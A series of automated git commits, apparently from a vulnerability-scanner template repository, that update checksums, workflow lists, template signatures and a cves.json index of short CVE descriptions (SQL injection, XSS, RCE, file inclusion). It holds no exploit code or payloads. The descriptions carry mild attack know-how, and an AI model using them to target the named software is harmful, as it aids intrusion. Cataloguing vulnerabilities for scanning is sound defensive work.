https://github.com/tinyproxy/tinyproxy metadata: From cd4f6dc7e4e3df9bbe22ccd6994a1855da88fa2e Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:04:10 +0000 Subject: [PATCH 102/375] Auto Generated New Template Addition List [Sun May 12 08:04:09 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 21c320ff36..4f5dd368dd 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/craftercms-panel.yaml +http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/technologies/craftercms-detect.yaml From d18694cefe964b6a2cd1f661c7c4f0fb5bd1cef7 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:04:25 +0000 Subject: [PATCH 103/375] Auto Generated Templates Checksum [Sun May 12 08:04:25 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4575afef48..4c87803f76 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -217,7 +217,7 @@ dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 dns/dns-rebinding.yaml:45774e6d0aabacb2fcf032dc41deb3073c8abba6 dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e -dns/dns-waf-detect.yaml:f7746eceeca514f20911c4152f2c17bbeb10242c +dns/dns-waf-detect.yaml:7f32662209d10627c60fca75caa4e03799703113 dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592 dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644 dns/elasticbeanstalk-takeover.yaml:d6be1fd0a3ee4d72149e942bcf77b93c175c1588 @@ -6628,7 +6628,7 @@ http/technologies/confluence-detect.yaml:a04bc71e42d461e8530902a2a69ae0f187506ff http/technologies/connectwise-control-detect.yaml:35b690093c8b71aa317417cd82264891dcbe277e http/technologies/couchbase-sync-gateway.yaml:f2ca1759ea3106b3f21b839b70fc52a23b67fcc3 http/technologies/craft-cms-detect.yaml:b0c7e4f8f830ab3e2f599ee62975557f48a21559 -http/technologies/craftercms-detect.yaml:967d664464179e29ecb14c10b61345e0dd9b4f77 +http/technologies/craftercms-detect.yaml:0239600f4a3b22dc74157fc4035819d87936fa74 http/technologies/csrfguard-detect.yaml:7a0e3757762d2336706a42a0e0218391624b96a6 http/technologies/cvsweb-detect.yaml:37d98f3ac251889862ae9937d35ac9823e7ccd94 http/technologies/dash-panel-detect.yaml:018b9e3b920a2b3622e740c9d022499ab09fe0c8 @@ -8504,7 +8504,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:602a2e89ec9d4a6e063ed5f0b4f4e0a09db2e1be +templates-checksum.txt:d9794e6063ce869679d056c7b930c2ac5a79cdc7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c788d56e5e481cca712709ed1d551f6c51ce59b5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:04:47 +0000 Subject: [PATCH 104/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3e4fb89e2b..e38d6f6c8d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/technologies/craftercms-detect.yaml' workflow_dispatch: From 101758caa8ec7f701b46b4d98ca25e8128208920 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:05:29 +0000 Subject: [PATCH 105/375] Auto Generated New Template Addition List [Sun May 12 08:05:29 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4f5dd368dd..4921ec9466 100644 --- a/.new-additions +++ b/.new-additions @@ -3,3 +3,4 @@ http/exposed-panels/craftercms-panel.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/technologies/craftercms-detect.yaml +http/technologies/tinyproxy-detect.yaml From 048d03026f91c2a5ba69d8cee0e436e6d6bfa7dd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:05:38 +0000 Subject: [PATCH 106/375] Auto Generated Templates Checksum [Sun May 12 08:05:38 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4c87803f76..d53ee8db35 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6925,6 +6925,7 @@ http/technologies/thinkphp-detect.yaml:4f4c4b8bb5ea605c7dd26335d710811935db624d http/technologies/tibco-businessconnect-detect.yaml:df1e040bbfa4c989246929173292176c9f5e3137 http/technologies/tibco-spotfire-services-detect.yaml:26a79d78f2c140283420e74921930270ad17851a http/technologies/tileserver-gl.yaml:27fe637c0f3de39676585f41d5980e246441bdab +http/technologies/tinyproxy-detect.yaml:ec51387f8f975ce3da63f0a9a675e9a6d7396c92 http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864 http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4 http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636 @@ -8504,7 +8505,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d9794e6063ce869679d056c7b930c2ac5a79cdc7 +templates-checksum.txt:e8fbafb43067877469b03daa618b2976298dc704 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3a99bf1ab1a68dca1933d77df6d9d25f63c546ac Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:05:58 +0000 Subject: [PATCH 107/375] Auto Template Signing [Sun May 12 08:05:58 UTC 2024] :robot: --- dns/dns-waf-detect.yaml | 3 +-- http/exposed-panels/craftercms-panel.yaml | 1 + http/misconfiguration/installer/moosocial-installer.yaml | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml index 74bf75b1b9..49522e2bc7 100644 --- a/dns/dns-waf-detect.yaml +++ b/dns/dns-waf-detect.yaml @@ -198,5 +198,4 @@ dns: name: ksyun words: - ".ksyunwaf.com" - -# digest: 4a0a0047304502200a845666375d02a84b9b0a1b56465d375357774b8c0c3a044dccf1e02fbf6267022100bf5e4f34f8e41d1cf13880ed6760c273df09e408a6d0c53c335dceeadac76182:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022005bf81b04ee9a74169b2ea8baf29b776c3da72d7bf13cdf16f62a84baa003daf0220758d7619504e7c6a45cc29f1e7f3c71f7cbba93b4444cf419ddc9b01d486d265:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml index a4355eb903..637e9b1bbe 100644 --- a/http/exposed-panels/craftercms-panel.yaml +++ b/http/exposed-panels/craftercms-panel.yaml @@ -32,3 +32,4 @@ http: group: 1 regex: - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' +# digest: 4a0a004730450221008f0a504337b6d23c677831b726cc8db9fd0d2f121cd363898e291746020c21010220587b99ea2eba7fdccb1f6883bbb072ee3516c6e0965f58f6b6ea1a38da1f6a91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/moosocial-installer.yaml b/http/misconfiguration/installer/moosocial-installer.yaml index fcb963e43f..982dffe81d 100644 --- a/http/misconfiguration/installer/moosocial-installer.yaml +++ b/http/misconfiguration/installer/moosocial-installer.yaml @@ -25,3 +25,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220604d6fd4b0d42d00cb69a6de6fd9fb6be4640fc77b52f7a5cd456b70204f44ac02201a0443dafa9f1e76cfee113ecdda14756f8c86e9721abeab06b8f5ec67d2472d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 89be3f606bf2d661e12a683e69108d6ee321fd79 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:06:14 +0000 Subject: [PATCH 108/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e38d6f6c8d..c1db7f4338 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/technologies/craftercms-detect.yaml' + - 'http/technologies/tinyproxy-detect.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 66175fe44d7e0eb51355bce9acfbbbaae14dcf58 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:06:17 +0000 Subject: [PATCH 109/375] Auto Generated Templates Checksum [Sun May 12 08:06:17 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d53ee8db35..426cc491fb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3155,6 +3155,7 @@ http/cves/2023/CVE-2023-43208.yaml:fe7941493bcf8b59fd55d2e57288bbb985cf2d65 http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56 http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6 http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d +http/cves/2023/CVE-2023-43374.yaml:4f7f62c35a898225da4c40a9b44f77de5b0f84e9 http/cves/2023/CVE-2023-43795.yaml:a14750da396529474d303182bee73893d7f284c9 http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e @@ -8505,7 +8506,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e8fbafb43067877469b03daa618b2976298dc704 +templates-checksum.txt:5c371db8064ff0116c0cf564c176e0dd4288a057 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8eeda92b775eb29c8fc61d552f50d341b4e7987e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:06:19 +0000 Subject: [PATCH 110/375] Auto Generated cves.json [Sun May 12 08:06:19 UTC 2024] :robot: --- cves.json | 16 ++++++++++++++-- cves.json-checksum.txt | 2 +- 2 files changed, 15 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index 1f0da01659..e0e8c711e5 100644 --- a/cves.json +++ b/cves.json @@ -1973,7 +1973,6 @@ {"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"} {"ID":"CVE-2022-48197","Info":{"Name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","Severity":"medium","Description":"Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48197.yaml"} {"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"} -{"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/ CVE-2023-6389.yaml"} {"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"} {"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"} {"ID":"CVE-2023-0159","Info":{"Name":"Extensive VC Addons for WPBakery page builder \u003c 1.9.1 - Unauthenticated RCE","Severity":"high","Description":"The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0159.yaml"} @@ -2262,12 +2261,14 @@ {"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} +{"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"} {"ID":"CVE-2023-43795","Info":{"Name":"GeoServer WPS - Server Side Request Forgery","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43795.yaml"} {"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"} {"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"} {"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"} {"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} {"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"} +{"ID":"CVE-2023-4521","Info":{"Name":"Import XML and RSS Feeds \u003c 2.1.5 - Unauthenticated RCE","Severity":"critical","Description":"The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4521.yaml"} {"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"} {"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"} {"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"} @@ -2319,6 +2320,7 @@ {"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"critical","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"} {"ID":"CVE-2023-6379","Info":{"Name":"OpenCMS 14 \u0026 15 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6379.yaml"} {"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"} +{"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6389.yaml"} {"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"} {"ID":"CVE-2023-6567","Info":{"Name":"LearnPress \u003c= 4.2.5.7 - SQL Injection","Severity":"high","Description":"The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6567.yaml"} {"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"} @@ -2328,13 +2330,16 @@ {"ID":"CVE-2023-6895","Info":{"Name":"Hikvision IP ping.php - Command Execution","Severity":"critical","Description":"A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"} {"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"} {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} +{"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"} {"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} +{"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} {"ID":"CVE-2024-0235","Info":{"Name":"EventON (Free \u003c 2.2.8, Premium \u003c 4.5.5) - Information Disclosure","Severity":"medium","Description":"The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-0235.yaml"} {"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"} {"ID":"CVE-2024-0337","Info":{"Name":"Travelpayouts \u003c= 1.1.16 - Open Redirect","Severity":"medium","Description":"The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0337.yaml"} {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"} {"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown 